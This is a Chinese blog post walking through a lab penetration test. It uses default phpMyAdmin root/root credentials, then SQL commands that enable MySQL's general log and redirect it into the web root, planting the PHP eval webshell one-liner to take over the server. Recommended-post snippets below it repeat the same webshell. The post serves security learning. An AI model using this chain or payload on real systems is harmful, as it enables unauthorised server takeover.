靶站渗透测试

最新推荐文章于 2024-09-09 11:04:38 发布
最新推荐文章于 2024-09-09 11:04:38 发布
阅读量302 收藏 3
点赞数 1
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70288605/article/details/137885793
版权
本文讲述了如何通过御剑工具对目标Web站点进行扫描,发现phpmyadmin漏洞后,利用root权限获取日志文件,植入php一句话木马,并最终在服务器上创建并控制webshell的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

web站点渗透

合理选择攻击机中的工具对目标Web进行扫描,收集信息,了解web服务器类型,查看是否有可疑端口、地址或文件。

这里选择的是御剑,用来分析目标地址有哪些网站。

其中发现了phpmyadmin网页地址,打开以后。

通过使用账号root,密码root成功进入后台

以root权限登录网站数据库后,尝试利用日志文件来进行 getshell。首先在 sql 处执行“SHOW VARIABLES LIKE 'general%'”查看是否开启日志功能以及日志文件的保存路径。

如日志功能暂未开启。可以执行“set global general_log = "ON";”开启 mysql 日志功能,再次确认日志功能是否开启。

之后执行 sql 语句“select <?php @eval($_POST[1]);?>’”,向日志文件中写入 php 一句话木马。

但由于在linuxmysql数据库的日志与web目录的用户权限是分开的,我们此时还无法通过目录地址访问该日志文件。

修改日志文件存储路径和文件名的语句为“set global general_log_file=' 绝对路径';”。

寻找网站在服务器上的绝对地址(浏览可能包含该信息的文件)。

通过上面的御剑扫描结果可以发现,有一个网址比较可疑,info.php

执行:“set global general_log_file=' C://xxx//xxx//xxx//shell.php';”将日志文件的存储路径改为站点根目录下的 shell.php 文件。

重新写入php一句话木马。

之后在浏览器中访问shell.php,查看是否能够访问成功。

使用webshell管理工具连接创建的shell.php文件,控制服务器。

孤怜-
关注
机渗透训练——JIS-CTF-VulnUpload-CTF01
z7sz的博客
06-22 614
这是一篇关于JIS-CTF-VulnUpload-CTF01机训练的文章
零基础渗透测试全程记录(打)——Lampiao
ran的博客
07-28 2499
权限提升,就是所谓的提权,因为一般进入拿到webshell后进入到服务器了都是低权限,在接下来的中我们的目标都是拿到root权限,所以拿到webshell后是低权限用户,这个时候我们需要一系列的方式进行提权,最后拿到root权限,即为结束。在上面扫描出的ip地址中,.1、.2、.254、.138都是其它的一些ip地址,所以在此确认要进行攻击的机的ip地址为:192.168.190.140。比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个场中比如信息收集包括查看源码,使用工具dirb等。
CTF实践 机渗透
Radiency的博客
11-23 1769
CTF实践。通过对目标机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
网络渗透CTF实践:获取Web Developer 文件/root/flag.txt中flag
yellowO的博客
12-27 6006
实验目的:通过对目标机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。利用该插件可能存在的漏洞。pwd查看当前所在的目录,cd切换到/var/www/html目录下,ls查看当前目录下的内容,找到wp-config.php文件。
文件上传漏洞详解
weixin_56218159的博客
06-03 986
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网授权前提下,禁止对政府、事业单位、企业或其他单位网及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
[CTF夺旗赛] CTFshow Web1-14 详细过程保姆级教程~
Da1NtY的博客
09-09 1万+
​ CTFShow通常是指网络安全领域中的“Capture The Flag”(夺旗赛)展示工具或平台。这是一种用于分享、学习和展示信息安全竞赛中获取的信息、漏洞利用技巧以及解题思路的在线社区或软件。参与者会在比赛中收集“flag”,通常是隐藏在网络环境中的数据或密码形式,然后通过分析、破解等手段找到并提交。CTFShow可以帮助人们了解最新的安全技术和挑战,同时也促进了安全知识和技术的交流。
Vulnhub机 DC-6 打实战 详细渗透测试过程
rumil的博客
04-20 2032
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
VulnHub机 DC-5 打 渗透测试详细过程
rumil的博客
04-18 1428
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
常见渗透测试
qfliweimin的博客
05-26 4374
1.DVWA 作为新手,通常第一个听说的场应该就是DVWA,部署简单安装完对应版本的PAM(PHP-Apache-MySQL),简单配置后就可以使用。 1、DVWA场可测试漏洞:暴力破解(Brute Force)、命令注入(Command Injection)、跨请求伪造(CSRF)、文件包含(File Inclusion)、文件上传(File Upload)、不安全的验证码(Insecure CAPTCHA)、SQL注入(SQL Injection)、SQL盲注(SQL Injection Bl
通过打训练,提高渗透的记忆.zip
最新发布
11-29
根据提供的文件信息,我们可以推断出一系列关于渗透测试的知识点,这些内容主要涉及到打训练在提升渗透记忆中的作用,以及VulnHub平台上名为TargetDrone的实战项目。以下是从文件信息中提取和构建的相关知识点: ...
ctf:OWASP_Broken_Web_Apps_VM_1.2机的初步了解
viviliving的专栏
12-02 1141
输入admin/admin显示登录成功。在kali里面可以ping 机ip。root/owaspbwa登录后。启动后没有图形界面,是一个中端。
CTF机 DC-3
weixin_52221158的博客
09-02 948
CTF场 DC-3详细讲解
18. CTF综合机渗透(十一)
weixin_30763397的博客
07-24 1105
机描述: SkyDog Con CTF 2016 - Catch Me If You Can 难度:初学者/中级 说明:CTF是虚拟机,在虚拟箱中工作效果最好。下载OVA文件打开虚拟框,然后选择文件->导入设备。从下载的地方选择OVA文件。在导入OVA文件之后,确保在启动VM之前禁用USB 2。默认情况下,只为主机设置适配器,但在启动之前,您可以根据网络设置改变这一点。虚拟机服务器配...
Web安全-用一句话木马拿下RDCTF机实战1
qq_46231152的博客
09-15 707
一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句话: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句话木马上传 回到首页,找到文件上传的网页 找到一句话木马文件 使用蚁剑连接 拿到flag ...
一个好玩的Web漏洞机系统
非衣鲲化的博客
02-12 6176
首先安装xampp,然后下载pikachu项目,解压以后将项目放入 /opt/lampp/htdocs   这个文件夹下,然后将export PATH=/opt/lampp/bin:$PATH   写入到~/.bashrc 文件的最后,最后启动服务  /opt/lampp/lampp start,最后在浏览器中访问 http://localhost/pikachu-master/  ,如果有红字的...
CTF7机渗透训练
weixin_44132032的博客
08-21 2884
CTF7机训练主机发现端口扫描查看服务器信息漏洞发现漏洞挖掘 ##环境下载 链接:https://pan.baidu.com/s/17IdF-74o278axL3Zj2V68A 提取码:kisb Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。 此次训练其中一步为获取目标的账号密码,故目标环境无需登录。 主机发现 使用命令: netdiscover 端口扫描 使用命令: namp...
网络渗透测试实验四-CTF实践(WebDeveloper机渗透)
YatKTm的博客
12-06 4053
文章目录前言实验目的系统环境实验工具实验原理:1、什么是CTF1.1 CTF竞赛模式(1)解题模式(Jeopardy)(2)攻防模式(Attack-Defense)(3)混合模式(Mix)1.2 CTF各大题型简介MISC(安全杂项)PPC(编程类)CRYPTO(密码学)STEGA(隐写)PWN(溢出)WEBweb类)实验步骤和内容:目的基本思路实现过程:1、发现目标 (netdiscover),找到WebDeveloper的IP地址。2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说
CTF web总结
热门推荐
giantbranch的专栏
04-09 8万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
ctf: 机的安装
viviliving的专栏
10-03 2812
Kali Linux Web渗透测试手册(第二版) - 1.3 - 机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件) 创建一个属于自己的机 配置网络使虚拟机正常通信 了解机上易受攻击的web应用程序 1.5、创建客户端虚拟机 现在,我们...
推荐一些渗透测试的视频
05-01
以下是一些不错的渗透测试视频: 1.《Web安全攻防之道》系列视频:这一系列视频讲解了渗透测试的基础知识和常用工具,并通过实际案例演示了如何利用漏洞进行攻击和防御。视频链接:https://www.bilibili.com/video/BV1Jx411L7ah 2. 《Metasploit渗透测试实战》系列视频:这一系列视频介绍了Metasploit框架的使用方法,包括漏洞利用、后门生成、持久化等技术。视频链接:https://www.bilibili.com/video/BV1sJ411K7q3 3. 《渗透测试实战》系列视频:这一系列视频演示了如何利用各种漏洞进行攻击,包括SQL注入、XSS、文件包含等,同时也讲解了如何使用Burp Suite等工具进行渗透测试。视频链接:https://www.bilibili.com/video/BV1hJ411X7nD 4. 《红队之路》系列视频:这一系列视频介绍了红队攻击的常用技术和工具,包括信息收集、漏洞利用、横向渗透、提权等。视频链接:https://www.bilibili.com/video/BV1dJ411y7Rn 希望这些视频能够帮助你学习渗透测试,提高你的技能水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值